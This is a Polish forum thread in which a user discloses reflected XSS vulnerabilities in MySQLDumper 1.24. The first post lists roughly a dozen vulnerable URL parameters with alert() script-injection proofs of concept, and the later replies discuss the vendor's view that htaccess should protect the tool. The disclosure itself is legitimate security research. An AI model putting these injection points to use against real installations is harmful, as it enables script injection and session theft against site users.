Pokaż wyniki 1 do 5 z 5

Temat: błędy mysqldumper 1.24

  1. #1
    lem
    lem jest offline
    Zarejestrowany
    Apr 2010
    Postów
    111

    Domyślnie błędy mysqldumper 1.24

    Kod:
    Name 	:  MySQLDumper 1.24 stable
    
    Vendor 	: Browse MySQLDumper Files on SourceForge.net
    
    Bug 	:  XSS
    
    Date 	: 16.06.2010
    
    Tested 	: Ubuntu 10
    
    Thanks	: 4 you
    
    Details	:
    	
    "> as a prefix for <script> is needed to close first < tag (see at source).
    
    http://localhost/mysqldump/msd1.24stable/filemanagement.php?action=dump&kind="><script>alert(1)</script>
    and another in :
    	filemanagement.php?dbactiv="><script>alert(32)</script>
    
    	msd1.24stable/restore.php?filename=<script>alert(111)</script>
    
    	msd1.24stable/restore.php?dump_encoding=<script>alert(111)</script>
    
    	msd1.24stable/sql.php?context="><script>alert(111)</script>
    
    	msd1.24stable/sql.php?tdc="><script>alert(111)</script>
    
    	msd1.24stable/sql.php?db="><script>alert(111)</script>
    	
    	msd1.24stable/sql.php?dbid="><script>alert(111)</script>
    
    	msd1.24stable/sql.php?tablename="><script>alert(111)</script>
    
    	msd1.24stable/sql.php?sql_statement="><script>alert(111)</script>
    
    	msd1.24stable/sql.php?bb="><script>alert(111)</script>

  2. #2
    lem
    lem jest offline
    Zarejestrowany
    Apr 2010
    Postów
    111

    Domyślnie

    rozmawialem wczoraj z producentem, zgodzilismy sie co do jednego. z punktu widzenia tworcow oprogramowania, blad wcale nie jest taki duzy, z tego wzgledu, ze dostepu do aplikacji powinien bronic htaccess...

  3. #3
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Prawda jest taka ze aplikacja tego typu nie powinna w ogole byc widoczna ze swiata :P
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

  4. #4
    lem
    lem jest offline
    Zarejestrowany
    Apr 2010
    Postów
    111

    Domyślnie

    Ba!
    Zdziwiło mnie jedno, po mailu od tego pana i jego sugestii na temat htaccess.
    Co jeśli ktoś obejdzie htaccess?

    Ale cóż... najważniejsze, że trochę się pobawiłem z tą aplikacją. Webgoat tak nie cieszy, jak zabawa na żywym organiźmie

  5. #5
    Zarejestrowany
    Jun 2006
    Skąd
    rand(.eu)
    Postów
    8,748

    Domyślnie

    Jesli ktos obejdzie htaccess to nie tylko apliakcja dziurawa ale i user glupi, bo htaccess to nic innego jak konfiguracja przniesiona z konfugu apacza do osobnego miejsce, ktore jest pod kontrola usera a nie admina
    ctrl-alt-del.cc - soft reset site for IT admins and other staff :-)

Zasady Postowania

  • Nie możesz zakładać nowych tematów
  • Nie możesz pisać wiadomości
  • Nie możesz dodawać załączników
  • Nie możesz edytować swoich postów
  •  
Subskrybuj

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52